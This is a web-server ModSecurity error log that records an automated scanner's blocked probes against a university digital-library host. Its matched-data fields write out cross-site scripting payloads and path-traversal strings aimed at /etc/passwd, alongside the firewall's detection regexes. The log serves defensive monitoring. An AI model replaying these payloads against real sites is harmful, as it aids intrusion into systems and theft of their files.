[Tue Aug 29 11:56:05.758855 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAqeFi0AAAAx"]
[Tue Aug 29 11:56:06.714088 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqSw6oAAAAN"]
[Tue Aug 29 11:56:06.872186 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16ZsCo-f0AAAqY6QwAAAAr"]
[Tue Aug 29 11:56:07.536310 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAApa-TIAAAAg"]
[Tue Aug 29 11:56:08.568201 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAApa-TkAAAAg"]
[Tue Aug 29 11:56:08.602675 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAApbUv4AAAAh"]
[Tue Aug 29 11:56:10.653393 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAqeFkMAAAAx"]
[Tue Aug 29 11:56:10.655664 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAq@shEAAAAM"]
[Tue Aug 29 11:56:11.680223 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAArB1yQAAAAV"]
[Tue Aug 29 11:56:11.680496 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAqY6SoAAAAr"]
[Tue Aug 29 11:56:12.699533 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAArC7hoAAAAW"]
[Tue Aug 29 11:56:13.541055 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16bcCo-f0AAAq5@OEAAAAK"]
[Tue Aug 29 11:56:13.611389 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApbUx8AAAAh"]
[Tue Aug 29 11:56:15.167459 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArC7iYAAAAW"]
[Tue Aug 29 11:56:15.186595 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAArC7icAAAAW"]
[Tue Aug 29 11:56:15.571195 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8YAAAAI"]
[Tue Aug 29 11:56:16.894882 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16cMCo-f0AAAqeFl4AAAAx"]
[Tue Aug 29 11:56:17.181650 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAArC7jUAAAAW"]
[Tue Aug 29 11:56:17.544269 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7jcAAAAW"]
[Tue Aug 29 11:56:18.914724 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq3a9UAAAAI"]
[Tue Aug 29 11:56:19.621198 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAolK10AAAAe"]
[Tue Aug 29 11:56:21.880400 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIAR8AAAAX"]
[Tue Aug 29 11:56:21.951944 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAAqeFn0AAAAx"]
[Tue Aug 29 11:56:22.916507 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAq-HZ4AAAAT"]
[Tue Aug 29 11:56:23.040813 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAq5@QAAAAAK"]
[Tue Aug 29 11:56:23.684833 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArIATEAAAAX"]
[Tue Aug 29 11:56:24.836986 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIAT4AAAAX"]
